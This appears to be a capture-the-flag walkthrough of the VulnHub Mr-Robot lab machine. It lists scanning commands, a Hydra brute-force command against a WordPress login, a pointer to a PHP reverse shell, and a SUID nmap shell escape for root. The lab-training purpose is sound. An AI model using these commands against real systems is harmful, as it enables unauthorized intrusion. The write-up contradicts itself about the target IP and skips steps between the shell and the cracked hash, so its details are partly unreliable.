VulnHub: MrRobot Walkthrough

130n@calvinlai.com

Author: 

Date : 06 Jan 2020

        

Background:

This box has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

https://www.vulnhub.com/entry/mr-robot-1,151/

Penetrating Methodology:

Service Scanning

Enumeration

Exploitation

Getting Less Privilege Shell

Walkthrough:

Target machine: 192.168.187.133

Attacking (Hacker) machine: 192.168.187.134

Hacking Process Part 0 – Service Scanning

The target machine IP is 192.168.187.134. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Quick Pre-searching

nmap  -p- 192.168.187.134

0.2) Details Analysis

nmap -p 22,80,443 -A -o nmap-mrRobot.txt 192.168.187.134

Enumeration strategies

  1. Check Website Vulnerability  
  2. Check any hidden files/folders of the website
  3. Check the website

Hacking Process Part 1 – Enumeration

1.1) Strategy 1 Check Vulnerability

Nikto -- no vulnerability can be abused to bypass authentication.

1.2) Strategy 2 Check any hidden files/folders of the website

python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://192.168.187.134/ -e php,txt -x 301,302,403,404 --simple-report=mrRobot.dirsearch

robots.txt is found which shown there are two files should not be index “fsocity.dic” and “key-1-of-3.txt”

  1. View the key-1-of-3.txt Got the first Key 073403c8a58a1f80d943455fb30724b9

  1. View the file fsocity.dic, which store a set of user account like id and password. Download and remove the duplicate records.

cat fsocity.dic | sort | uniq > fsocity.uniq

1.3) Check the website according to the dirsearch result, visit the wordpress login page.

wpscan --url http://192.168.187.134 -e p --output wpscan-mrRobot.txt

As the forget password function will return the message if the username or email address is invald, thus, using Hydra to test and find the user Id according to the name list found above.

hydra -vV -L ./download/fsocity.uniq -p fkclai 192.168.187.134 http-post-form '/wp-login.php?action=lostpassword:user_login=^USER^&redirect_to=&wp-submit=Get+New+Password:Invalid username' > hydra-lostpwd-ac-mrRobot.txt

Get the usernames: elliot

Using the same file to try again to get the password.

Login: elliot and password: ER28-0652 are found, and login the wordpress admin page successfully.

Hacking Process Part 2 – Exploitation

2.1) Reverse Shell Exploitation

Using the http://pentestmonkey.net/tools/php-reverse-shell

After several tried with different decryption website, the hashed password was abcdefghijklmnopqrstuvwxyz

Hacking Process Part 3 – Getting Low Privilege Access

Exploiting vulnerable SUID executable to get root access

3.1) Prints the executables which have SUID bit set

find / -user root -perm -4000 2>/dev/null

3.2)  Confirm if nmap has SUID bit set or not.

3.3) runs nmap in interactive mode and using “!sh” command escape to the system shell from nmap shell

Reference Link

A Guide To Linux Privilege Escalation

https://payatu.com/guide-linux-privilege-escalation